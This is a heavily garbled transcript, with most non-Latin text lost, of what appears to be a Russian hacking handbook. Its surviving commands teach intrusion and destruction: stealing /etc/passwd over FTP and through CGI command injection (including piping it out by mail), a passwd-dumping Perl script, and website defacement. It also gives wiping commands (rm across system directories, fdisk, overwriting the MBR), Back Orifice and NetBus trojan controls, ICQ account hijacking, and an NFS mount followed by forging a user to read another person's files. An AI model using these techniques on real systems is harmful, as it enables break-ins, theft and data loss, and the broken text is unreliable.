Levin M. Haking 1
Transcript of Levin M. Haking 1
-
8/7/2019 Levin M. Haking 1
1/112
:
681.3 32.973.26018.2
363
., 2006
,2006
.363 :
. .: , 2006. 224 .
.
681.3 32.973.26018.2
2006
-
8/7/2019 Levin M. Haking 1
2/112
, .
, , , .
,
(, TCP/IP). .
?
!
.
:
Linux
RedHat
UNIX SlackWare
UNIX
FreeBSD , UNIX
: Linux BSD (FreeBSD,OpenBSD, NetBSD)? .
.
, :
ftp 21
telnet 23
smtp 25
http 80
pop3 110
3 4
-
8/7/2019 Levin M. Haking 1
3/112
.
, :FTP (21)
, FTP, , .
FTP? File Transfer Protocol( ). , FTP , 21 , , .
TELNET (23)
, ( ), .
telnet ? , (!) ( !) .
SMTP (25)
, ,
? ,
. Simple Mail Transfer Protocol .
HTTP (80)
Hyper Text Transfer Protocol .
, , , Internet.
web, ( ) . , .
, ! , web .
POP3 (110)
MailAgent (, Microsoft Outlook).
() .
5 6
-
8/7/2019 Levin M. Haking 1
4/112
? ,
UNIX . ( ) UNIX.
Windows (MUST_DIE), (A, B, C,D) :
C:\MUST_DIE\die.com
UNIX /, ( CDROM) (,/cdrom).
. .
.
/etc. () /etc passwd .. /etc/passwd.
, , ,
, .
, !
, IP.
:tracert ( UNIX traceroute)
w3.cnn.com
( ) IP
(IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).
ftp (
IP). ? MSDOS PROMPT MSDOS.
( ) login. Internet.
Password.
7 8
-
8/7/2019 Levin M. Haking 1
5/112
Internet.
( , , ! w3.dos.net IIS
(Internet Information Server), !
.
:
Directory /home/usr/_ not
foundLogging in "/"
, , .
:
ftp> ( ) get /etc/passwd
.? . , find MUST_DIE passwd (). ,
ftp (.. MUST_DIE). , find.
, . , , , !
,
! :
, .
?
IP . , , . , .
: ? ,
9 10
-
8/7/2019 Levin M. Haking 1
6/112
Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) ,
Internet. .
Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . ,
, IP:port ( , 195.34.34.30:21 , FTP zone.ru).
, ,
23 ( telnet) ( telnet ip:port. , 23). , .
/, . ,
, , .
23 , ,
. .
( ). 273275 , , , ,
:
, Internet. , . . , .
11 12
-
8/7/2019 Levin M. Haking 1
7/112
( 19).
, , .
, .
(Finger).
finger , , , .
,
? 1 1024 (wellknown). , services. Windows
C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/
( , ). , (WWW, mail,FTP, news, telnet). , SMTP
25 ,POP3 110 , WWW 80 , FTP 21
, ,
. ! , ( ) , .
, , , ( ,
Internet !).
13 14
-
8/7/2019 Levin M. Haking 1
8/112
.
.
, ?
, . . ,
sendmail ( wiz debug FTP, ).
, , .
Windows
.
, Internet. , .
. , , . . , ++,
(root) , !!! FTPBounce , , FTP( / / ) ,
. ( ). ,
15 16
-
8/7/2019 Levin M. Haking 1
9/112
FTP ,
. ( ). ,
( !).
, ( !), . ,
: NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () .
, , NT, UNIX, Sun OS (, ).
,
, , .
. , ?
,
netstat a ( ) :
Active Connections
Proto Local Address
Foreign Address State
TCP localhost:1027
0.0.0.0:0 LISTENINGTCP localhost:135
0.0.0.0:0 LISTENING
TCP localhost:135
0.0.0.0:0 LISTENING
TCP localhost:1026
0.0.0.0:0 LISTENING
TCP localhost:1026
localhost:1027 ESTABLISHED
TCP localhost:1027
localhost:1026 ESTABLISHED
TCP localhost:137
0.0.0.0:0 LISTENING
TCP localhost:138
17 18
-
8/7/2019 Levin M. Haking 1
10/112
0.0.0.0:0 LISTENING
TCP localhost:nbsession
0.0.0.0:0 LISTENING
UDP localhost:135 *:*UDP localhost:nbname *:*
UDP localhost:nbdatagram *:*
. , .
, Local Address () 135, 137, 138 nbsession ( 139 netstatan, , .
MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :
Active Connections
Proto Local Address Foreign
Address State
TCP localhost:1027
0.0.0.0:0 LISTENING
TCP localhost:1350.0.0.0:0 LISTENING
TCP localhost:135
0.0.0.0:0 LISTENING
TCP localhost:2508
0.0.0.0:0 LISTENING
TCP localhost:25090.0.0.0:0 LISTENING
TCP localhost:2510
0.0.0.0:0 LISTENING
TCP localhost:2511
0.0.0.0:0 LISTENING
TCP localhost:2514
0.0.0.0:0 LISTENINGTCP localhost:1026
0.0.0.0:0 LISTENING
TCP localhost:1026
localhost:1027 ESTABLISHED
TCP localhost:1027
localhost:1026 ESTABLISHEDTCP localhost:137
0.0.0.0:0 LISTENING
TCP localhost:138
0.0.0.0:0 LISTENING
TCP localhost:139
0.0.0.0:0 LISTENING
19 20
-
8/7/2019 Levin M. Haking 1
11/112
TCP localhost:2508
zlliks.505.ORG:80 ESTABLISHED
TCP localhost:2509
zlliks.505.ORG:80 ESTABLISHEDTCP localhost:2510
zlliks.505.ORG:80 ESTABLISHED
TCP localhost:2511
zlliks.505.ORG:80 ESTABLISHED
TCP localhost:2514
whitehouse.gov:telnet ESTABLISHED
, . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.
www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . ,
,
1024 . ? , 2508 2511.
? Internet () netstat r. :
Route Table
Active Routes:
Network Address Netmask Gateway
Address Interface Metric
0.0.0.0 0.0.0.0
198.59.999.200 198.59.999.200 1
127.0.0.0 255.0.0.0127.0.0.1 127.0.0.1
1
198.59.999.0 255.255.255.0
198.59.999.200 198.59.999.200 1
198.59.999.200 255.255.255.255
127.0.0.1 127.0.0.1
1
198.59.999.255 255.255.255.255
198.59.999.200 198.59.999.200 1
224.0.0.0 224.0.0.0
198.59.999.200 198.59.999.200 1
255.255.255.255 255.255.255.255
198.59.999.200 0.0.0.0
21 22
-
8/7/2019 Levin M. Haking 1
12/112
1
Active Connections
Proto Local Address
Foreign Address StateTCP lovelylady:1093
mack.foo66.com:smtp ESTABLISHED
Gateway Address Interface IP ( IP , ). ,
, 10 , , , ( ) , ( ).
, Internet . p: . ? . .
e
mail UUPC . online
offline . init init1 \UUPC. login password. . Ho ,
.
usera , login:.
.
, Netscape, SLIP & PPP, ,
y , . , . transmit . , , Windows.
23 24
-
8/7/2019 Levin M. Haking 1
13/112
, :
.pwl. Windows . . , DES. Ho . ,
.pwl , 1,2,3,4 , , .
,
. , . . . ,
. BBS, . ! Ha 100%. login, password. , .
,
. yp ( )
. .
login/passwd,
. root . Ho . , , .
UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho
, , AT&T UNIX 1971 . UNIX:
25 26
-
8/7/2019 Levin M. Haking 1
14/112
-
8/7/2019 Levin M. Haking 1
15/112
(daemon) .
exploit:
ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit
openSource ( ), ++.
UNIX. exploit ( ) UNIX wuftp2.42 ( root):
#gcc .
#./a.out
( )
IP , offset , ,
() (
5000 +5000 +100, .. : 5000 4900
4800 0 100 200 5000).
, . , ,
(patch) , (bugs) .
, .
root?Root
. Root , root (superuser), , !
root? root (, , , ).
29 30
-
8/7/2019 Levin M. Haking 1
16/112
? exploit. ,
exploit. ? , C++, , , .
() exploit remote access ( ), ..
exploit ( , ) remoteaccess.
?
, ( ), ?
1. (,).
2. .
3. , .
, . : /etc (
), ftpusers ( BSDI UNIX), default () root 21
(ftp) . joe ( ) root ftp.
? root #, (Ctrl+k,
x).
( root):
#joe /etc/ftpusers
root #, Ctrl+k, x.
, , ( ?).
, root , root
, ( ) , !
:
#ftp ip_address or host_name
31 32
-
8/7/2019 Levin M. Haking 1
17/112
login: root
password: !
!
root ! ( , )
? ! exploit!
:
login incorrect
1 1.000.000 ( ), , () .
exploit( , root). :
#passwd
:
New unix passwd:
( ) 12345
:
Unix password too weak, please
retype password:
?
, UNIX MUST_DIE!
: Abc04k9834z
? !
, , ! ,
! , () ZRHEN.
12345 :
Retype password:
12345
, ! FTP.
#ftp
ftp>open ip_address or host_name
( ,
33 34
-
8/7/2019 Levin M. Haking 1
18/112
, )
login: root
password: 12345
! ( , ? WWW !)
ftp bye:
ftp>bye
.
ftp, ?
!
telnet ( 23), .
exploit
, :#telnet 127.0.0.1 80
127.0.0.1 loopback .. ip; 80 HTTP (Hyper
Text Transfer Protocol) , , :
we hack you
, ( , ?).
, , .. . , !
?
!
?
()
: , apache ( web). :
#which apache
:
/usr/sbin/apachectl
35 36
-
8/7/2019 Levin M. Haking 1
19/112
/usr/local/sbin/apachectl
, , , , DocumentRoot(httpd.conf). :
/usr/etc/apache
/usr/local/etc/apache
( ) apache DocumentRott(home_dir) :
/www
/home/www
/usr/local/www
:
#cd home_dir home_dir www. index.htm index.html. ?
:
#ls full | more
(www). :
#rm index.htm (index.html)
.
:
#joe index.htm (index.html)
( joe) :
This site hacked by Vasya
Ctrl+k, x.
joe .
! UNIX
, . , Internet:
Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d (pop3 daemon) port 110
37 38
-
8/7/2019 Levin M. Haking 1
20/112
. ( roota) :
#killall httpd
web .
#killall ftpd
ftp .
, :
( roota):
#httpd start ( Linux)
#apachectl restart ( FreeBSD
web
apache)
ftpd:
#ftpd ( !)
. . , ( roota):
#cd /
#rm * ( (!)
)
#cd /boot
#rm *
#cd /bin
#rm *#cd /sbin
#rm *
#cd /usr/bin
#rm *
#cd /usr/sbin
#rm *
, ( /etc, ).
, .. rm
: /bin /sbin /usr/bin /usr/sbin ,
( rm ). :
#which rm
39 40
-
8/7/2019 Levin M. Haking 1
21/112
, rm. .
?
:
#cd /etc
#rm *
!
:
#reboot
( )
, 100%
? ( roota):
#fdisk
p ( . (, 4), :
d (enter), 4 (enter)
d (enter), 3 (enter)
d (enter), 2 (enter)
d (enter), 1 (enter)
w nter.
! !( !)
UNIX dd, ( )., . SlackWare:
:hda1 slack ; hda2 dos ; hdc2
slack
( , DOS, , MBR (Master Boot Record)
hdc2 (SlackWare). UNIX ? ! ):
dd /dev/hda /dev/hdc 0 512
:
512 . 512 ?Master Boot Record (MBR).
41 42
-
8/7/2019 Levin M. Haking 1
22/112
512 ( )
???
dd () hda hdc!
hdc!
, Ctrl+, dd. dd 20
8 , Internet 2
: dd fdisk.
, ( ).
99%
(), () ! (
() .
() ( portscanner):
#portscanner 55.55.55.55 1 1024
55.55.55.55 IP ; 1
;1024 .
( n ) ( ):
21
2225
80
110
:
43 44
-
8/7/2019 Levin M. Haking 1
23/112
-
8/7/2019 Levin M. Haking 1
24/112
Count.dat .
2. : (, ):
Count.cgi 755. ..#chmod count.cgi 755
Count.cgi 777. ..#chmod count.dat 777
telnet , ftp , ftp, chmod ftp.
count.cgi:
#!/usr/bin/perl
print "Contenttype: text/html\n\n";
open (file,"count.dat);
@dat=;
close (file);
$dat[0]++;
open (file,">count.dat");
print "$dat[0]\n";
close (file);
print " $dat[0]\n";
count.dat ( 5).
! , count.cgi 1.
CGI
( ) .. CGI ! ( ,.. , ), : .
( , )
( email ). email :
cat /etc/passwd
47 48
-
8/7/2019 Levin M. Haking 1
25/112
cat /etc/master.passwd
cat /etc/shadow
(). , , .
:
Root:fdkjhgSFDgf:
( john the ripper) .:
.
, .
? , () () .
,
, , , .
, () , () .
? () .core.
? , , , , .
, realnetworks ( realaudio/realvideo). ,
UIN: Bugs, Crack
Social Ingineering
:
, 49 50
-
8/7/2019 Levin M. Haking 1
26/112
UIN ,
, . , .
: Internet
, . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e
mail . , keyboard sniffer , .
ICQ Low, Medium High.
. ,
, ICQ. ( , ). UIN , , , reboot, ,
ICQ , keyboard sniffer . .
,
: , sniffer .
, ? ,
?
,
, UIN 51 52
-
8/7/2019 Levin M. Haking 1
27/112
http://www.icq.com/password/ ICQ
email .
UIN
email.
. , POP3Password Crack
. , . , hotmail.com , email , .
: ICQ 777777.
UIN! email, [email protected]. UIN , 2 . sometihg.com email , . , email
777777. ,
: email .
(: email , web ), web.
53 54
-
8/7/2019 Levin M. Haking 1
28/112
( email ) [email protected]. . , :
, . . , , . , 80% , ,
.
. UIN , email .
,
, ICQ 8 . Windows UIN .
Linux, , , password, ( ,
root ).
Linux ICQ , UIN
55 56
-
8/7/2019 Levin M. Haking 1
29/112
9, . ?
UINa. Linux ICQ , .
ICQ ,
: ICQ email?
: , ICQ
ICQhijeck. IP, UINa ICQhijeck spoofed , , .
.
, .
: , . ICQ?
: . , , ICQsniff , ICQ . , ,
, . , , , , , , , .
: ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer
57 58
-
8/7/2019 Levin M. Haking 1
30/112
, ?
:
Private Bug, . , , ICQ, .
tools ? , , . .
. ,
, , www.yahoo.com. .
,
, UIN ,
ICQ.
, , , ICQ
.
, ICQ , Windows. ,
www.icq.com ICQ, . , .
. web .
free emeil, freewebhosting . , email, .
59 60
-
8/7/2019 Levin M. Haking 1
31/112
, , , email
ICQ .
, , .
.
Internet , , ,
. ,
ICQ ,
. , ICQ ? ,
Internet
.
, Nuke 139, http://www.microsoft.com .
Internet , , Proxy , , http://www.gin.ru.
:http://www.teamcti.com/pview/PrcView.zip, ,
61 62
-
8/7/2019 Levin M. Haking 1
32/112
: RUN Windows 95/98
: regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !
, sharin ssl
, cgi , .
()
(
) :
1.
, , C++, Visual C++, Delphi, , 16 32
( Windows95/98)
2. , . , . , , .
1
!!! !!! ? , , 2
, http://www.microsoft.com.
:
1. 1632 :
63 64
-
8/7/2019 Levin M. Haking 1
33/112
-
8/7/2019 Levin M. Haking 1
34/112
.
. . , !!! NeoLite,
:http://www.neoworx.com. .
2. , , , !!! ! 2 1!
Back
Orifice
BO 4
. , 4 .:
BoServ.exe
.
, . Windows
. (, PrcView) .exe. Bo. Windows\system\windll.dll,
Bo.
BoGui.exe
.
.
BoConfig.exe
, BoServ.exe .
, , ..
BoClient.exe
, BoGui.exe,
67 68
-
8/7/2019 Levin M. Haking 1
35/112
Target host:port
, BO. , , 31337.
:
Directory creat
().
Directory list
Directory remove
Export add sharing
Export delete
sharing
Export list
sharing
File copy
File delete
File find
File view
HTTP enable
HTTP
HTTP disable
HTTP
Key log begin
Key log end
MM capture avi
.avi
MM capture frame
frame
MM capture screen
Screen Shot c
69 70
-
8/7/2019 Levin M. Haking 1
36/112
MM list capture device
MM play sound
Net connections
Net delete
Net use
Net view
Ping host
Bo
Process kill
Process list
Process spawn
Reg
Windows System dialog box
System info
System lockup
System passwords
System reboot
.
!
NetBus
Net Bus
2 .patch.exe
. ,.. , .
71 72
-
8/7/2019 Levin M. Haking 1
37/112
Netbus.exe
.
Net Bus:
Host name/IP
Port
, 12345
Serevr admin
. , ..
Open CDROM
CDROM
Show image
Swap mouse
Start program
Msg manager
Screendump
Screen Shot
Get info
Play sound
Exit Windows
Send text
Active winds
Mouse pos
Listen
OnLine, Ctrl+Esc,Alt+ Tab ..
Sound system
73 74
-
8/7/2019 Levin M. Haking 1
38/112
Server setup
patch.exe
Control mouse
Go to URL
URL
Key manager
File manager
( )
,
Net Bus Users & Lamers. patch.exe . Back Orifice .
. . Internet
Back Orifice
Back Orifice Eliminator ,
BO!!! IP , BO Server,
Net Bus
Net Buster , Net Bus!!! IP , patch.exe (, , ),
c:\. 1000 .
IP ICQ?
icqs.exe. icqs.rar.
75 76
-
8/7/2019 Levin M. Haking 1
39/112
?
,
, , , , , ,,
, , , .
IP Internet . ,
, http://www.yandex.ru, .. ,, email ( Guest Book`s,, IP
). , IP, , , , , , , IP,
, IP,
, .. ( )
( ), Internet , . .
, Internet , ,
., , .
77 78
l it t / d
-
8/7/2019 Levin M. Haking 1
40/112
exploit, , , .
, , , ( ?), , , exploit
, , . , , .
.
. , , .
, !
? ! . . , , . Internet( ). !
etc/passwd
RU.HACKER RU.NETHACK
: etc/passwd? , ?
, , ,
, , . , , , , .
? , , , , . , ! ! ! http://kpnc.webprovider.com/hack.pl, etc/passwd , .
79 80
! ( demo Demo User
-
8/7/2019 Levin M. Haking 1
41/112
, ! ( , Netscape, ;
IE 4.0 (5.0) , , etc/passwd , , ,, , ).
:
DISPLAY ETC/PASSWORD FILE
LOGIN NAME DIR
root System Administrator /root
toor System Administrator /rootdaemon System Daemon /
sys Operating System /tmp
bin BSDI Software
/usr/bsdi
operator System Operator
/usr/opr
uucp UNIXtoUNIX Copy
/var/spool/uucppublic
games Games Pseudouser
/usr/games
news USENET News,,,
/var/news/etc
demo Demo User
/usr/demo
mail Sendmail
/var/spool/mail
brian Brian Atkins,,,
/export/home/brian
kannada Narendra Tumkur
/disk1/k/kannada
pumpkin2 liao xin
/disk1/p/pumpkin2
lost508 no idea/disk1/l/lost508
essepi Salvatore Calarco
/disk1/e/essepi
rajatbhasin Rajat Bhasin
/disk1/r/rajatbhasin
panze Congo Koa/disk1/p/panze
goni1 Naseer Bhatti
/disk1/g/goni1
madmama patty noland
/disk1/m/madmama
yccwp yang changchun
/disk1/y/yccwp
. , . .
81 82
-
8/7/2019 Levin M. Haking 1
42/112
, .
,
, , , , , , . , , ,
:LOGIN NAME DIR
demo Demo User /usr/demo
. ,
?
?
? , . , , , !
? ? , ,
(, )!
, ,
. nethackk1.htm ( HTML) :
etc/pasw ?
83 84
-
8/7/2019 Levin M. Haking 1
43/112
HTML, , , , hack.pl.
? html? , hack.pl. , . hack.pl ? , ,
?
, , ! ,
. , , madmama. ?
madmama.webprovider.com ?
Index of /
Name Last modified Size
Description
[DIR] Parent Directory 09Oct1999
11:10
[DIR] _private/ 09Oct1999 11:30
[TXT] form.html 09Oct1999 12:26 1k
[DIR] images/ 09Oct1999 11:30
[TXT] irc.html 09Oct1999 12:21 0k
[TXT] mamairc.html 09Oct1999 12:18
4k
[TXT] postinfo.html 09Oct1999 11:30
2k
[TXT] thank_you.html 09Oct1999
12:26 1k ! _private.
, ? . , !
, , !
, . madmama , !!!
? , dbf prices. ,
85 86
c
-
8/7/2019 Levin M. Haking 1
44/112
c. , . ! ,
!
, , ? , ? , ,
( ). . Etc/password , ( ) . ! Etc/password
!
etc/password ,
., ,
, .
, . ,
, :news USENET News,,, /var/news/etc
( , ,NetInfo), c , .
, , , . POP3 ( ), SMTP ( ).
, etc/password! ? ftp (, ).
ftp://ftp.werbprovider.com . , .
, WWW FTP
87 88
, UNIX
-
8/7/2019 Levin M. Haking 1
45/112
, . etc/password
( ) .
?
UNIX UNIX , UNIX, , ,
, .
Red Hat Black Cat , UNIX hobbiton.org ( , telnethobbiton.org 'newuser').
,
UNIX
, . , , , . , , !
, UNIX, . , , , UNIX,
. UNIX
Mortal Commander ( NortonCommander)
Windows. UNIX, . Mortal Commander .
89 90
-
8/7/2019 Levin M. Haking 1
46/112
LINUX bash
-
8/7/2019 Levin M. Haking 1
47/112
.
, , .
.
(, , TC, TENEX PDP10).
. ,
, . AT&T System V, .
, , GNU, bash Borne AgainShell.
,
CShell . , , .
, , , ( )., , .
cat /etc/shells, UWIN :
cat /etc/shells
/usr/bin/ksh
/usr/bin/sh/usr/bin/tcsh
/usr/bin/csh
/bin/sh
/bin/ksh
/bin/csh
/bin/tcsh
93 94
,
-
8/7/2019 Levin M. Haking 1
48/112
(, ), .
exit. . (
/usr/bin /bin
, ).
$ echo $SHELL/usr/bin/ksh
$ /usr/bin/sh
# echo $SHELL
/usr/bin/ksh
# exit$ /usr/bin/tcsh
# echo $SHELL
/usr/bin/ksh
# exit
$ /usr/bin/csh
%echo $SHELL
/usr/bin/ksh
%exit
command.com (MSDOS) dir, UNIX
.
, . UNIX ls, /bin. , CYGWIN
, fileutils.tar.gz .
,
ls /.ls /
A E proc
base.bat etc reg
baseserviceslink.sh F sys
bin H tmp
C home usrD lib var
dev linka win
, /etc , ls:
95 96
$ ls /etc , ,
-
8/7/2019 Levin M. Haking 1
49/112
crontab inetdconfig.sh passwd.add
traceit
in.ftpd init.exe priv.exe
tracer.exe
in.rlogind login.allow profile
ucs.exe
in.rshd login.deny rc ums.exe
in.telnetd mailx.rc services
inetd.conf mkpasswd.exe shells
inetd.exe passwd stop_uwin
? , ? ? ., , web. Java VisualBasic. , , ,
. , .
, HTML. HTML
. HTML ., , , Java . . .
? ,
. ..
, , ,
( ) . , , . ,
, (, , ).
, .
97 98
CGI BIN
, ?
-
8/7/2019 Levin M. Haking 1
50/112
CGIBIN. , . exe BackOrifice2000., . ,
, PentiumPro Windows NT, .
, . DEC Alpha UNIX.
, ? . , .
NT. Perl , UNIX, NT. , , . , .
? PL!, Perl. , ! , Perl! , .
! .
, .
(, www.agava.ru). ?
, , . !
! , , , , , .
, www cgibin
99 100
, !
VirtualAve
20
-
8/7/2019 Levin M. Haking 1
51/112
, , , !
, , , !
,
CGI CGI , , .
. ?
, , Internet ! , , ! , CGI+Free+Perl , .
, , , .
20 . cgibin,
Perl. sendmail,
( ).
,
http://yourname.virtualave.net/. FTP,
(, ftp://server26.virtual.ave). .
. ., . , . , .
Hypermart
10 ( ), , Perl .
101 102
,
Webjump
25
-
8/7/2019 Levin M. Haking 1
52/112
.
, http://yourname.hypermart.net/., , http://server26.hypermart.net/ kpnc .
FTP, , , .
, , email. email , . , , ZMAIL.RU TELEMEDNET.RU. , .
25 CGIBIN, () , Perl , .
, , , ( ) !
ProHosting
,
. . .
JustFree
cgibin . ,
, , .
103 104
!
, FTP WWW
-
8/7/2019 Levin M. Haking 1
53/112
, ,
. , . , , , ,
!
., , FTP. FTP,
. , FAR.
FTP.
, ( , ).
FTP WWW, !
. Enter . , , , . !
, , , Norton Commander, , .
? , /CGIBIN, ! ! . , . HyperMart , Virualave /public_html. , . Perl. , .
105 106
-
8/7/2019 Levin M. Haking 1
54/112
/var/news/etc
demo Demo User
nonroot Nonroot root user for
NFS/nonexistent
-
8/7/2019 Levin M. Haking 1
55/112
demo Demo User
/usr/demo
mail Sendmail
/var/spool/mail
brian Brian Atkins,,,
/export/home/brian
alias ,,,
/var/qmail/alias
qmaild ,,,
/var/qmailqmaill ,,,
/var/qmail
qmailp ,,,
/var/qmail
qmailq ,,,
/var/qmail
qmailr ,,,
/var/qmail
qmails ,,,
/var/qmail
ftp FTP Daemon,,,
/var/spool/ftp
proftp FTP Daemon,,,/var/spool/ftp
www Publish Account,,,
/usr/home/www
nobody Unprivileged user
/nonexistent
NFS/nonexistent
hmvbin 6553666559 reserved for
hmv/nonexistent
! !(, demo). , ? , ,, , .
, , , .
1
. , .
! !
2
, , , , .
109 110
( ) ! ? ,
3
-
8/7/2019 Levin M. Haking 1
56/112
? , .
, , . , , ( ), , ( web , ).
|mail [email protected]
-
8/7/2019 Levin M. Haking 1
57/112
href=http://kpnc.id.ru>PRO
HACK
";print "DISPLAY ETC/PASSWD FILE \n";print "";
print "";
print " LOGIN";
print " NAME";
print " DIR";
open(PASS, "
-
8/7/2019 Levin M. Haking 1
58/112
EP/IX
/etc/shadow
HPUX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux 1.1
/etc/shadowOSF/1
/etc/passwd[.dir|.pag]
SCO Unix #.2.x
/tcb/auth/files//
SunOS4.1+c2
/etc/security/passwd.adjunct
SunOS 5.0
/etc/shadow
System V Release 4.0/etc/shadow
System V Release 4.2
/etc/security/
databaseUltrix 4
/etc/auth[.dir|.pag]
? .
open(PASS, "
-
8/7/2019 Levin M. Haking 1
59/112
. ( )., , ,
. . .
? , : finger, rusers,showmount, rpcinfo, dns, ftp, sendmail .
. ?
allias, nameserver , . nslookup.
# g @
[www.xxx.xxxx.su]
Login NameTTY Idle When
Office
kuzmenko Vladimir Kizmenko p0
4:57 Sun 08:25
kuzmenko Vladimir Kizmenko p1
2:38 Sun 08:26
milichen Yuri Mulichenko p44:59 Fri 19:41 3B/r410 13513
sherbak Eugeny Scherbkov p5
5:00 Sat 10:18 221/r448 17733
devil# finger [email protected]
[ccsix.xxxx.xxxx.ru]Login: yur
Name: Yuri A. Podgorodsky
Directory: /home/yur
Shell: /bin/bash
On since Sat Apr 12 12:24 (MSK) on
ttyp0 from jannet.xxxx.xxxx3 hours 35 minutes idle
Mail forwarded to
No mail.
No Plan.
devil# rusers l unisun.xxxxxxxx.net
117 118
Login Name
TTY When Idle
unknown
100000 2 udp
0 0 0 0 0
-
8/7/2019 Levin M. Haking 1
60/112
Host
lavrov unisun.xxxxx
xxx:console Apr 2 10:32 17:37suh unisun.xxxxx
xxx:ttyp0 Apr 5 10:20
17:32 (mskws.desy.de)
lavrov unisun.xxxxx
xxx:ttyp1 Apr 2 11:21
25:55 (:0.0)lavrov unisun.xxxxx
xxx:ttyp2 Apr 2 10:33
97:11 (:0.0)
,
, shell , . Idle, , .
2. rpcinfodevil# rpcinfo sun10.xxx.xxx.su
program version netid address
service owner
100000 2 tcp
0.0.0.0.0.111 rpcbind
0.0.0.0.0.111 rpcbind
unknown
100004 2 udp0.0.0.0.2.150 ypserv
unknown
100004 2 tcp
0.0.0.0.2.151 ypserv
unknown
100004 1 udp0.0.0.0.2.150 ypserv
unknown
100004 1 tcp
0.0.0.0.2.151 ypserv
unknown
100069 1 udp
0.0.0.0.2.152
unknown
100069 1 tcp
0.0.0.0.2.154
unknown
100007 2 tcp
0.0.0.0.4.0 ypbindunknown
100007 2 udp
0.0.0.0.4.3 ypbind
unknown
100007 1 tcp
119 120
0.0.0.0.4.0 ypbind
unknown
100007 1 d
100005 2 tcp
0.0.0.0.2.226 mountd
k
-
8/7/2019 Levin M. Haking 1
61/112
100007 1 udp
0.0.0.0.4.3 ypbind
unknown100028 1 tcp
0.0.0.0.2.156 ypupdated
unknown
100028 1 udp
0.0.0.0.2.158 ypupdated
unknown100009 1 udp
0.0.0.0.3.255 yppasswdd
unknown
100029 1 udp
0.0.0.0.2.159 keyserv
unknown
100003 2 udp0.0.0.0.8.1 nfs
unknown
100005 1 udp
0.0.0.0.2.223 mountd
unknown
100005 2 udp0.0.0.0.2.223 mountd
unknown
100005 1 tcp
0.0.0.0.2.226 mountd
unknown
unknown
100024 1 udp
0.0.0.0.2.226 statusunknown
100024 1 tcp
0.0.0.0.2.228 status
unknown
100021 1 tcp
0.0.0.0.2.229 nlockmgrunknown
rpcinfo RPC . mountd, nisd, ypserv ypbind, statd, bootparam, pcnfsd, rexd. statd .pcnfsd mountd , rexd .
3. NIS (nisd, ypbind, ypserv).
NIS
, NIS NIS rpc . :
devil# ypx dg sun10.xxx.xxx.su
121 122
Trying domain sun10.xxx.xxx.su
Trying domain sun10
Trying domain xxx xxx su
YP map transfer successfull.
-
8/7/2019 Levin M. Haking 1
62/112
Trying domain xxx.xxx.su
sysdiag:*:0:1:Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System
Diagnostic:/usr/diag/sundiag:/usr/diag
/
sundiag/sundiag
sybase:*:13:55:syb:/usr/nms/sybase:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
audit:*:9:9::/etc/security/audit:/bin/
csh
uucp:*:4:8::/var/spool/uucppublic:
sync:__F324VMRDcL6:1:1::/:/bin/syncroot:__Ye.Ibw.8uQg:0:3:Operator:/:/bin
/csh
news:*:6:6::/var/spool/news:/bin/csh
sys:*:2:2::/:/bin/csh
snm:__7ck.pfEh/2s:11:11:Network
Manager:/usr/snm:/bin/cshrom:__IriAsoksSeE:10:10:Victor
Romanchik:/usr/rom:/bin/csh
nms:*:12:55:Network
Manager:/usr/nms:/bin/csh
bin:*:3:3::/bin:
__ .
NIS , bootparam /var/yp, .
4. showmountdevil# showmount e
thsun1.xxxx.xxxxx.su
export list for thsun1.xxxx.xxxxx.su:
/pub
(everyone)
/optthsun2,thsun3,tlx39
/pgm/linux
(everyone)
/export
(everyone)
/usr
(everyone)/tftpboot
(everyone)
/cdrom/sol_2_3_hw894_sparc/s0
(everyone)
/home
123 124
(everyone)
/scratch/users
(everyone)
512 Feb 14 11:16 lnp
drwxrxrx 6 root other
512 Feb 14 11:19 lnup
-
8/7/2019 Levin M. Haking 1
63/112
(everyone)
showmount , , . export, home, usr !
devil# mount F nfs
thsun1.xxxx.xxxxx.su:/home /mntdevil# cd /mnt
devil# ls al
total 12524
drwxrxrx 17 root root
1024 Jun 28 1996 .
drwxrxrx 28 root root1024 Apr 12 16:29 ..
drwxrxrx 2 root root
512 May 19 1995 TT_DB
drwxrxrx 3 root 798
512 Nov 25 1994 cfi
drwxrxrx 6 root 100
512 Nov 25 1994 dugdrwxrxrx 9 root other
512 Feb 17 11:19 lcta
drwxrxrx 3 root other
512 Jun 19 1996 lhep
drwxrxrx 6 root other
512 Feb 14 11:19 lnup
drwxrxrx 4 root other
512 Jan 15 1995 lnurdevil# cd lnup
devil# ls al
total 12
drwxrxrx 6 root other
512 Feb 14 11:19 .
drwxrxrx 17 root root1024 Jun 28 1996 ..
drwxrxrx 3 6000 600
512 Oct 30 1995 dolbilov
drwxrxrx 9 6190 600
1024 Oct 7 1996 davgun
drwxrxrx 4 6001 600
512 Oct 20 1995 gvfdrwxrxrx 4 6003 600
512 Apr 4 10:31 yup
devil# echo 'dolbilov::600:' >>
/etc/groups
devil# echo
'dolbilov:x:6000:600::/noway:/bin/csh'>> /etc/passwd
devil# su dolbilov
$ cd dolbilov
$ ls al
total 30
125 126
drwxrxrx 3 dolbilov dolbilov
512 Apr 12 16:21 .
drwxrxrx 6 root other
220 www.xxx.ru ESMTP Sendmail
8.8.5/8.8.5; Sat, 12 Apr 1997
15:55:36 +0400
-
